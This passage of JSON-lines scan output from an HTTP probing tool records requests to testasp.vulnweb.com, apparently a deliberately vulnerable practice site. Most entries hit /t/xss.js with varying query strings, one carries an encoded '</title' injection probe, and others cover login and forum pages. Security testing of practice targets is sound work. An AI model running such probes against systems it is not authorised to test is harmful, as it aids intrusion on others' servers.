Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.730234855Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?921307\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?921307\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?921307\",\"time\":\"349.008801ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.797031835Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?926150\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?926150\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?926150\",\"time\":\"347.812239ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:29.843959402Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?926150%3C/title\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?926150%3C/title\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?926150%3C/title\",\"time\":\"348.908014ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.110735396Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?926670\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?926670\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?926670\",\"time\":\"342.10768ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.159857131Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9292\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9292\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9292\",\"time\":\"355.653986ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.183225973Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9304\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9304\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9304\",\"time\":\"348.504956ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.183331382Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9311\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9311\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9311\",\"time\":\"348.240455ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.194902317Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9323\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9323\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9323\",\"time\":\"350.986717ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.195434584Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?931151\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?931151\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?931151\",\"time\":\"357.013654ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.201968123Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9393\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9393\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9393\",\"time\":\"358.033845ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.210743196Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9411\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9411\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9411\",\"time\":\"339.695447ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.224417171Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9423\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9423\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9423\",\"time\":\"340.045862ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.228545452Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?941974\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?941974\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?941974\",\"time\":\"357.442644ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.232674124Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9421\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9421\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9421\",\"time\":\"348.310749ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.234474669Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?946371\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?946371\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?946371\",\"time\":\"346.793437ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.252349867Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?949506\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?949506\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?949506\",\"time\":\"352.173415ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.254859171Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9514\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9514\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9514\",\"time\":\"348.446956ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.255003862Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?952136\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?952136\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?952136\",\"time\":\"348.738942ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.498233844Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9523\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9523\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9523\",\"time\":\"343.55332ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.537066861Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9543\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9543\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9543\",\"time\":\"352.317115ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.628553208Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9562\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9562\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9562\",\"time\":\"352.789333ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.639303175Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9597\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9597\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9597\",\"time\":\"348.164155ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.654299229Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?960229\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?960229\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?960229\",\"time\":\"351.892333ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.764697602Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?961537\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?961537\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?961537\",\"time\":\"348.215522ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.919438095Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9630\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9630\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9630\",\"time\":\"349.463888ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.981385606Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?963863\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?963863\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?963863\",\"time\":\"353.988807ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:39.999864123Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9669\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9669\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9669\",\"time\":\"352.4162ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.005277182Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?968091\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?968091\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?968091\",\"time\":\"350.418118ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.011361967Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9673\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9673\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9673\",\"time\":\"356.526447ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.02261246Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9687\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9687\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9687\",\"time\":\"348.371831ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.08845663Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?969889\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?969889\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?969889\",\"time\":\"355.871546ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.138817494Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9785\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9785\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9785\",\"time\":\"339.897774ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.197493463Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/xss.js?9807\",\"input\":\"http://testasp.vulnweb.com/t/xss.js?9807\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"application/javascript\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/xss.js?9807\",\"time\":\"351.899828ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":27,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.232054812Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/123\",\"input\":\"http://testasp.vulnweb.com:80/123\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/123\",\"time\":\"347.051912ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.251608431Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FDefault%2Easp%3F\",\"time\":\"352.841818ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3198,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.257930319Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FDefault%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FDefault%2Easp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FDefault%2Easp\",\"time\":\"355.234893ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3192,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.26455337Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Default.asp\",\"input\":\"http://testasp.vulnweb.com:80/Default.asp\",\"title\":\"acuforum forums\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Default.asp\",\"time\":\"354.153758ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":328,\"lines\":46,\"status_code\":200,\"content_length\":3539,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.266454036Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FRegister%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FRegister%2Easp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FRegister%2Easp\",\"time\":\"356.907622ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3194,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.269696532Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml\",\"time\":\"344.553776ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3256,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.288186898Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Default.asp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=/Default.asp\",\"title\":\"acuforum login\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/Login.asp?RetURL=/Default.asp\",\"time\":\"340.131723ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":429,\"lines\":55,\"status_code\":200,\"content_length\":3192,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:18:40.291868467Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FSearch%2Easp\",\"input\":\"http://testasp.vulnweb.com:80/Login.asp?RetURL=%2FSearch%2Easp\",\"title\":\"acuforum 